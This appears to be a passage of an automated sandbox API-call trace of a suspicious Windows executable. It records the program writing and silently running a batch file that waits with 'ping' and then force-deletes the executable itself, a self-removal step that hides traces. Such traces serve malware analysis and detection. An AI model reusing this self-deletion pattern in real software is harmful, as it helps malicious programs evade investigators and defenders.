38 [0097.652] FreeResource (hResData=0x50d64c) returned 0 [0097.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.652] 
WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0097.652] GetTickCount () returned 0x23513 [0097.652] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15444125476) returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="t畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="K畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: 
lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="T畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="z畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0097.652] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0097.652] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0097.652] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe") returned 0x30 [0097.653] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0097.653] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0097.653] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0097.653] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0097.654] CloseHandle (hObject=0xe8) returned 1 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbcc, dwThreadId=0xbd0)) returned 1 [0097.662] CloseHandle (hObject=0xec) returned 1 [0097.662] CloseHandle (hObject=0xe8) returned 1 [0097.662] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId 
() returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] WSACleanup () returned 0 [0097.838] FreeLibrary (hLibModule=0x77380000) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentProcess () returned 0xffffffff [0097.838] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0097.838] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] ResetEvent (hEvent=0x88) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] ResetEvent (hEvent=0x88) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] CloseHandle (hObject=0x88) returned 1 [0097.839] CloseHandle (hObject=0x8c) returned 1 [0097.839] CloseHandle (hObject=0x84) 
returned 1 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, 
wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] 
GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.842] FreeLibrary (hLibModule=0x76910000) returned 1 [0097.842] LocalFree (hMem=0x154458) returned 0x0 [0097.842] FreeLibrary (hLibModule=0x76910000) returned 1 [0097.842] LocalFree (hMem=0x154448) returned 0x0 [0097.842] 